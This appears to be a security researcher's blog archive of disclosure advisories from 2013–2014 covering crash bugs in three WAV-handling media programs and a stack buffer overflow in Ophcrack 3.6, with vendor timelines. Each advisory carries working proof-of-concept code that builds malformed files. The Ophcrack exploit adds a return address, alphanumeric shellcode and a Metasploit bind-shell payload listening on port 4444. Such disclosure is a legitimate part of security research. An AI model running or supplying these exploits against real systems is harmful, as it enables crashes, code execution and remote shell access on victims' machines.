Ofilter Player WAV File Handling Division-by-zero DoS Weakness

1. Advisory Information

Title: Ofilter Player WAV File Handling Division-by-zero DoS Weakness
Advisory URL: https://osandamalith.com/2014/01/10/ofilter-player-wav-file-handling-division-by-zero-dos-weakness/
Date published: 2014-01-10
Vendors contacted: 008soft
Release mode: User release

2. Vulnerability Information

Class: Integer division by zero
Impact: Denial of Service (DoS)
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: N/A

3. Summary

Easy Karaoke Player is a software that is playing karaoke, recording karaoke songs to wav format files. This application is able to read all types of multimedia files with an integrated multimedia player that is both efficient and full-powered.

4. Vulnerability Description

Ofilter Player contains a flaw that may allow for a denial of service. The issue is triggered when a user opens a malformed WAV file, resulting in a division-by-zero error and a loss of availability for the program. This can be exploited remotely by tricking a user into opening the crafted file (e.g., via email), or locally by placing it in a location that may seem safe (e.g., a network share).

5. Vulnerable Packages

  • 1.1

6. Credits

This bug was researched by Osanda Malith Jayathissa.

7. Proof of Concept / Technical Details

[code language=”php”]

<?php
/*
*Title: Ofilter Player 1.1 (.wav) Integer Division by Zero
*Version: 1.1
*Tested on: Windows XP SP2 en
*Vendor: http://www.008soft.com/
*Software Link: http://www.008soft.com/downloads_OfilterPlayer.exe
*E-Mail: OsandaJayathissa@gmail.com
*Bug Discovered by: Osanda Malith
*Twitter: @OsandaMalith
* /!\ Author is not responsible for any damage you cause
* This POC is for educational purposes only
*/
$poc=
"\x2E\x73\x6E\x64\x00\x00\x01\x18\x00\x00\x42\xDC\x00\x00\x00\x01".
"\x00\x00\x1F\x40\x00\x00\x00\x00\x69\x61\x70\x65\x74\x75\x73\x2E".
"\x61\x75\x00\x20\x22\x69\x61\x70\x65\x74\x75\x73\x2E\x61\x75\x22".
"\x40\x4f\x73\x61\x6e\x64\x61\x4d\x61\x6c\x69\x74\x68\x00\x00\x00".
"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x74\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41";

file_put_contents("ofilterplayer.wav", $poc);
print <<< str
[+] Ofilter Player 1.1 Integer Division by Zero
[+] by Osanda Malith (@OsandaMalith)
[~] File Created "ofilterplayer.wav"
str;
?>

[/code]

8. Report Timeline

2013-09-19: The researcher notifies the vendor 008soft.
2013-09-23: The researcher attempts to contact the vendor
2013-10-05: The researcher attempts to contact the vendor
2014-01-10: Advisory and public disclosure

9.  Disclaimer 

The information contained within this advisory is supplied “as-is” with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information.

10. References

[1] http://packetstormsecurity.com/files/124610/Ofilter-Player-1.1-Integer-Division-By-Zero.html
[2] http://www.exploit-db.com/exploits/30550

Microsoft Windows Live Movie Maker WAV File Handling DoS Weakness

1. Advisory Information

Title: Microsoft Windows Live Movie Maker WAV File Handling DoS Weakness
Advisory URL: https://osandamalith.com/2014/01/10/microsoft-windows-live-movie-maker-wav-file-handling-dos-weakness/
Date published: 2014-10-10
Vendors contacted: Microsoft
Release mode: User release

2. Vulnerability Information

Class: Integer division by zero
Impact: Denial of Service (DoS)
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: 2013-4858

3. Summary

Microsoft Windows Live Movie maker is a inbuilt application in Windows 7 systems. It is used in simple scale video editing purposes.

4. Vulnerability Description

Microsoft Windows Live Movie Maker contains a flaw that may allow for a denial of service. The issue is triggered when a user opens a malformed WAV file, resulting in a loss of availability for the program. This can be exploited remotely by tricking a user into opening the crafted file (e.g., via email), or locally by placing it in a location that may seem safe (e.g., a network share).

5. Vulnerable Packages

  • Version 2011 (Build 15.4.53508.1109)

6. Credits

This bug was researched by Osanda Malith Jayathissa.

7. Proof of Concept

[code language=”ruby”]
#!/usr/bin/env ruby
#Title: Windows Live Movie Maker 2011 (.wav) DoS Local Exploit
#Version: Version 2011 (Build 15.4.53508.1109)
#Tested on: Windows 7 Professional 32-bit SP1
#E-Mail: OsandaJayathissa@gmail.com
#Exploit-Author: Osanda Malith Jayathissa
#Video: https://www.youtube.com/watch?v=SBJYzSNdY6k
# /!\ Auhor is not responsible for any damage you cause
# Use this material for educational purposes only
#This is just a simple crash not an exploitable bug
#Twitter: @OsandaMalith
#Date: 25 Decemeber 2013
#CVE: 2013-4858
begin
dos =(
"\x2E\x73\x6E\x64\x00\x00\x01\x18\x00\x00\x42\xDC\x00\x00\x00\x01"+
"\x00\x00\x1F\x40\x00\x00\x00\x00\x69\x61\x70\x65\x74\x75\x73\x2E"+
"\x61\x75\x00\x20\x22\x69\x61\x70\x65\x74\x75\x73\x2E\x61\x75\x22"+
"\x40\x4f\x73\x61\x6e\x64\x61\x4d\x61\x6c\x69\x74\x68\x00\x00\x00"+
"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"+
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x74\x41\x41\x41\x41\x41\x41"+
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"+
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"+
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"+
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"+
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"+
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"+
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"+
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"+
"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"+
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"+
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"+
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41")

file = open("WindowsMovieMaker.wav","w")
file.write(dos)
file.close()

puts "[+] Exploit created >> WindowsMovieMaker.wav"
puts "[*] Open any image and Click add music and add our payload"
puts "[~] by Osanda Malith"
end
#EOF
[/code]


8. Report Timeline

2013-10-16: The researcher notifies the vendor Microsoft.
2013-20-16: Confirms that is only a crash and not a exploitable bug.
2014-01-10: Public disclosure.

9.  Disclaimer 

The information contained within this advisory is supplied “as-is” with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information.

10. References

[1] http://packetstormsecurity.com/files/124596/Windows-Live-Movie-Maker-2011-Denial-Of-Service.html

Acknowledged by Rackspace

Last month back in December I taught of hunting Rackspace for vulnerabilities. I was able to report over 10 reflective XSS vulnerabilities in their website. I think I was able to report the majority of the bugs in their website. They have a responsible disclosure policy and my name got published 🙂 http://www.rackspace.com/information/legal/rsdp

hof

(more…)

Ophcrack Local Stack Based Buffer Overflow

1. Advisory Information

Title: Ophcrack 3.6 Local Stack Based Buffer Overflow
Advisory URL: https://osandamalith.com/2013/12/28/ophcrack-local-stack-based-buffer-overflow
Date published: 2013-12-29
Vendors contacted: OBJECTIF SÉCURITÉ
Release mode: User release

2. Vulnerability Information

Class: Buffer Overflow [CWE-119]
Impact: Code Execution
Remotely Exploitable: No
Locally Exploitable: Yes
CVE Name: N/A

3. Summary

Opcrack is a password cracker based on rainbow tables, a method that makes it possible to speed up the cracking process by using the result of calculations done in advance and stored rainbow tables.

4. Vulnerability Description

Ophcrack contains an overflow condition that is triggered as user-supplied input is not properly validated when passed via the ‘Host name:’, ‘Share:’, ‘User:’ fields. This may allow a local attacker to cause a stack-based buffer overflow, resulting in a denial of service or potentially allowing the execution of arbitrary code. Failure to exploit this vulnerability may cause denial of service.

5. Vulnerable Packages

  • 3.6
  • Older Versions might be vulnerable as well, they were not tested

6. Credits

This bug was researched and proof of concept exploit by Osanda Malith Jayathissa.

7. Proof of Concept / Technical Details

The EIP register is overwritten by our supplied arbitrary buffer.

[code language=”c”]
(1bbc.17c8): Access violation – code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=ffffffff ebx=41414141 ecx=75d83d66 edx=00330dc0 esi=41414141 edi=41414141
eip=41414141 esp=002895a0 ebp=41414141 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210202
41414141 ?? ???
[/code]

poc

Proof of concept exploit code.

[code language=”python”]
#!/usr/bin/python
# Title: Ophcrack 3.6 Local Stack Based Buffer Overflow
# Version: 3.6
# Tested on: Windows XP SP2 en, Windows 8 64-bit
# Vendor: http://ophcrack.sourceforge.net/
# Software Link: http://sourceforge.net/projects/ophcrack/files/ophcrack/3.6.0/ophcrack-win32-installer-3.6.0.exe
# Original Advisory: https://osandamalith.com/2013/12/29/ophcrack-local-stack-based-buffer-overflow/
# E-Mail: osandajayathissa@gmail.com
# Exploit-Author: Osanda Malith
# Twitter: @OsandaMalith
# /!\ Author is not responsible for any damage you cause
# This POC is for educational purposes only
# Video: https://www.youtube.com/watch?v=YPPIyxPMakI
”’
This exploit is super lame, as no user is going to paste 1000 characters
of text into the textbox, however it could potentially be used for
privilege escalation. It was still a fun learning exercise.
”’
”’
To exploit this bug open Ophcrack -> Click Load -> Remote SAM
There are three fields "Host name:", "Share:", "User:"
All three fields are vulnerable. I have made this exploit to work on those 3 fields.
Copy the contents written to the file into the specific field you selected and click ok.
”’
print ”’

_/_/ _/ _/
_/ _/ _/_/_/ _/_/_/ _/_/_/ _/ _/_/ _/_/_/ _/_/_/ _/ _/
_/ _/ _/ _/ _/ _/ _/ _/_/ _/ _/ _/ _/_/
_/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/
_/_/ _/_/_/ _/ _/ _/_/_/ _/ _/_/_/ _/_/_/ _/ _/
_/
_/

[+] Opchrack 3.6 Local Buffer Overflow Exploit
[+] Author: Osanda Malith Jayathissa < osandajayathissa [at] gmail.com >
[~] Special Thanks to Matt "hostess" Andreko < mandreko [at] accuvant.com >

”’
while True:
try:
choice = int(raw_input("[?] In which field do you want to inject our payload?\n1.Host name\n2.Share\n3.User\n"))
except ValueError:
print "[!] Enter only a number"
continue
# If you select "Host name" you would get a error after injecting. Click "Don’t send" and enjoy the payload
if choice == 1:
buff = "A" * 497
break
elif choice == 2:
buff = "A" * 504
break
elif choice == 3:
buff = "A" * 504
break
else:
print "[-] Invalid Choice"
continue
# jmp instruction must be ‘ascii’ due to character set restrictions
# jmp esp | asciiprint,ascii {PAGE_EXECUTE_READ} [QtCore4.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v4.8.4.0 (C:\Program Files\ophcrack\QtCore4.dll)
eip = "\x39\x5b\x2b\x6e"

while True:
try:
choice = int(raw_input("[?] Choose your payload:\n1.Calculator\n2.Bind Shell\n"))
except Exception, e:
print "[!] Enter only a number"
continue

if choice == 1:
#ALPHA3.py esp –input="shellcode.bin"
shellcode = "TYhffffk4diFkDql02Dqm0D1CuEE0l3i8o3J378P4P8L4u8L3g0f3A0B1n2K405o7N5K328O4E3T4I0g"
shellcode += "0c1k0Q4M358P5M4y0I2Z3g3I3E3E2j4C2r110H135l0p0H7o381M0E0s3i4Z3D4p5k2C1l335N4R4L4D"
shellcode += "3w4X4H1L4p2n3R3M3L3C2x4s8o4H3M8N4y3J4P3j4S1k3b3L0h2r08125o1K0b1o101P0514373A1o0Z"
shellcode += "3O340Q0O0n5n4F4B8n4X1k0i4u4m0S407o0c1m4m4P5M2y135O1K0V1l4z3D0G3S0h120C4I183B0y14"
shellcode += "3h4H3G8K3S1L2k3E4r162Z3E7k5O138P5L3H0O0c0T15034I0v3M3P4H3h0Z2H3w3h3C002k7l4L3J1L"
shellcode += "2F3h0w3q0b8O3u2q064O1p4K3w0P3S0w1N2O2B043K0K7p3r4n1k2z0p017k0F3p4Y0u093d301n0n"
break
elif choice == 2:
# Thanks to Matt for teaching me about choosing correct shellcode 🙂
# Modify this part with your own custom shellcode
# msfpayload windows/shell/bind_tcp EXITFUNC=thread LPORT=4444 R| msfencode -e x86/alpha_mixed -t c BufferRegister=ESP
shellcode = (
"\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b"
"\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58"
"\x50\x38\x41\x42\x75\x4a\x49\x49\x6c\x69\x78\x4e\x69\x73\x30"
"\x65\x50\x47\x70\x71\x70\x6f\x79\x39\x75\x74\x71\x78\x52\x31"
"\x74\x6e\x6b\x70\x52\x50\x30\x4e\x6b\x33\x62\x34\x4c\x4c\x4b"
"\x66\x32\x64\x54\x4c\x4b\x51\x62\x74\x68\x64\x4f\x4e\x57\x51"
"\x5a\x45\x76\x45\x61\x59\x6f\x74\x71\x59\x50\x4e\x4c\x37\x4c"
"\x70\x61\x53\x4c\x56\x62\x76\x4c\x47\x50\x39\x51\x7a\x6f\x56"
"\x6d\x46\x61\x6a\x67\x78\x62\x7a\x50\x70\x52\x46\x37\x4e\x6b"
"\x52\x72\x76\x70\x6e\x6b\x37\x32\x65\x6c\x43\x31\x4a\x70\x4c"
"\x4b\x71\x50\x54\x38\x4c\x45\x59\x50\x62\x54\x50\x4a\x45\x51"
"\x6e\x30\x32\x70\x6e\x6b\x71\x58\x46\x78\x6c\x4b\x50\x58\x31"
"\x30\x65\x51\x49\x43\x38\x63\x47\x4c\x32\x69\x4c\x4b\x54\x74"
"\x6c\x4b\x37\x71\x58\x56\x46\x51\x69\x6f\x56\x51\x39\x50\x4e"
"\x4c\x5a\x61\x6a\x6f\x76\x6d\x46\x61\x68\x47\x57\x48\x6d\x30"
"\x31\x65\x6c\x34\x53\x33\x73\x4d\x39\x68\x67\x4b\x31\x6d\x64"
"\x64\x43\x45\x58\x62\x51\x48\x4c\x4b\x53\x68\x61\x34\x66\x61"
"\x6a\x73\x35\x36\x6c\x4b\x44\x4c\x42\x6b\x6e\x6b\x71\x48\x67"
"\x6c\x33\x31\x6b\x63\x6c\x4b\x47\x74\x4e\x6b\x55\x51\x6a\x70"
"\x4e\x69\x63\x74\x67\x54\x47\x54\x71\x4b\x43\x6b\x45\x31\x76"
"\x39\x52\x7a\x73\x61\x69\x6f\x6b\x50\x32\x78\x63\x6f\x72\x7a"
"\x4c\x4b\x36\x72\x58\x6b\x6d\x56\x61\x4d\x62\x48\x65\x63\x50"
"\x32\x45\x50\x35\x50\x31\x78\x64\x37\x54\x33\x76\x52\x43\x6f"
"\x63\x64\x50\x68\x50\x4c\x54\x37\x37\x56\x65\x57\x59\x6f\x48"
"\x55\x6f\x48\x6a\x30\x76\x61\x45\x50\x53\x30\x66\x49\x6f\x34"
"\x30\x54\x32\x70\x75\x38\x37\x59\x6b\x30\x30\x6b\x57\x70\x49"
"\x6f\x68\x55\x56\x30\x42\x70\x50\x50\x32\x70\x31\x50\x36\x30"
"\x73\x70\x50\x50\x35\x38\x68\x6a\x74\x4f\x49\x4f\x69\x70\x39"
"\x6f\x39\x45\x4c\x49\x6a\x67\x55\x61\x59\x4b\x56\x33\x52\x48"
"\x74\x42\x47\x70\x56\x71\x33\x6c\x4e\x69\x39\x76\x31\x7a\x64"
"\x50\x52\x76\x56\x37\x32\x48\x59\x52\x59\x4b\x37\x47\x55\x37"
"\x79\x6f\x4a\x75\x50\x53\x50\x57\x31\x78\x68\x37\x7a\x49\x54"
"\x78\x4b\x4f\x59\x6f\x4a\x75\x50\x53\x62\x73\x31\x47\x45\x38"
"\x50\x74\x4a\x4c\x57\x4b\x68\x61\x59\x6f\x4e\x35\x72\x77\x4e"
"\x69\x4b\x77\x65\x38\x52\x55\x50\x6e\x50\x4d\x35\x31\x59\x6f"
"\x5a\x75\x65\x38\x70\x63\x70\x6d\x70\x64\x35\x50\x6f\x79\x79"
"\x73\x61\x47\x72\x77\x43\x67\x70\x31\x68\x76\x53\x5a\x54\x52"
"\x33\x69\x32\x76\x59\x72\x69\x6d\x51\x76\x4f\x37\x70\x44\x47"
"\x54\x45\x6c\x36\x61\x35\x51\x6c\x4d\x43\x74\x75\x74\x62\x30"
"\x49\x56\x73\x30\x42\x64\x63\x64\x52\x70\x63\x66\x30\x56\x70"
"\x56\x43\x76\x63\x66\x72\x6e\x52\x76\x63\x66\x50\x53\x53\x66"
"\x63\x58\x52\x59\x4a\x6c\x65\x6f\x4f\x76\x49\x6f\x48\x55\x6b"
"\x39\x79\x70\x70\x4e\x72\x76\x30\x46\x79\x6f\x44\x70\x50\x68"
"\x33\x38\x4e\x67\x45\x4d\x51\x70\x39\x6f\x58\x55\x6f\x4b\x59"
"\x70\x35\x4d\x37\x5a\x75\x5a\x31\x78\x6f\x56\x7a\x35\x4d\x6d"
"\x6f\x6d\x79\x6f\x38\x55\x67\x4c\x57\x76\x73\x4c\x65\x5a\x6f"
"\x70\x49\x6b\x6b\x50\x74\x35\x66\x65\x6d\x6b\x31\x57\x72\x33"
"\x61\x62\x70\x6f\x32\x4a\x37\x70\x56\x33\x59\x6f\x69\x45\x41"
"\x41")
print "[+] Connect on port 4444"
break
else:
print "[-] Invalid Choice"
continue

junk = "A" * 100
# Glad to write this at 17 😉
# Combine strings
exploit = buff + eip + shellcode + junk
print "[+] Writing to file >> exploit.txt"
# Write it out to file
file = open("exploit.txt", "w")
file.write(exploit)
file.close()
print "[~] " + str(len(exploit)) + " Bytes written to file"
print "[+] Copy all the contents inside the file into the field you selected and click ok"
#EOF

[/code]


8. Report Timeline

2013-12-28: The researcher notifies the vendor OBJECTIF SÉCURITÉ.
2013-12-29: Vendor confirms that it is not a big issue as the risk is low in exploiting. But would patch it in the next release and acknowledge.
2013-12-29: Public advisory released

9.  Disclaimer 

The information contained within this advisory is supplied “as-is” with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information.

10. References

[1] http://packetstormsecurity.com/files/124622

Easy Karaoke Player WAV File Handling DoS Weakness

1. Advisory Information

Title: Easy Karaoke Player WAV File Handling DoS Weakness
Advisory URL: https://osandamalith.com/2013/12/27/easy-karaoke-player-wav-file-handling-dos-weakness
Date published: 2013-12-22
Vendors contacted: 008soft
Release mode: User release

2. Vulnerability Information

Class: Integer division by zero
Impact: Denial of Service (DoS)
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: N/A

3. Summary

Easy Karaoke Player is a software that is playing karaoke, recording karaoke songs to wav format files. This application is able to read all types of multimedia files with an integrated multimedia player that is both efficient and full-powered.

4. Vulnerability Description

Easy Karaoke Player contains a flaw that may allow a denial of service. The issue is triggered when handling a specially crafted WAV file. This may allow a context-dependent attacker to crash the program.

5. Vulnerable Packages

  • 3.3.31
  • Older Versions might be vulnerable as well, they were not tested

6. Credits

This bug was researched by Osanda Malith Jayathissa.

7. Proof of Concept / Technical Details

[code language=”python”]
#!/usr/bin/python
#Title: Easy Karaokay Player 3.3.31 (.wav) Integer Division by Zero
#Version: 3.3.31 (Older Versions might be vulnerable as well)
#Tested on: Windows XP SP2 en
#Vendor: http://www.008soft.com/
#Software Link: http://www.008soft.com/downloads_karaoke.exe
#E-Mail: OsandaJayathissa@gmail.com
#Author: Osanda Malith
#Twitter: @OsandaMalith
# /!\ Author is not responsible for any damage you cause
# This POC is for educational purposes only
string=("\x2E\x73\x6E\x64\x00\x00\x01\x18\x00\x00\x42\xDC\x00\x00\x00\x01"
"\x00\x00\x1F\x40\x00\x00\x00\x00\x69\x61\x70\x65\x74\x75\x73\x2E"
"\x61\x75\x00\x20\x22\x69\x61\x70\x65\x74\x75\x73\x2E\x61\x75\x22"
"\x40\x4f\x73\x61\x6e\x64\x61\x4d\x61\x6c\x69\x74\x68\x00\x00\x00"
"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x74\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41")

filename = "keraokayplayer.wav"
file = open(filename , "w")
file.write(string)
file.close()
#EOF
[/code]

pic

8. Report Timeline

2013-09-19: The researcher notifies the vendor 008soft.
2013-09-23: The researcher attempts to contact the vendor
2013-10-05: The researcher attempts to contact the vendor
2013-12-22: Advisory and public disclosure

9.  Disclaimer 

The information contained within this advisory is supplied “as-is” with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information.

10. References

[1] http://www.exploit-db.com/exploits/30422/
[2] http://packetstormsecurity.com/files/124577/Easy-Karaoke-Player-3.3.31-Integer-Division-By-Zero.html
[3] http://www.osvdb.org/show/osvdb/101441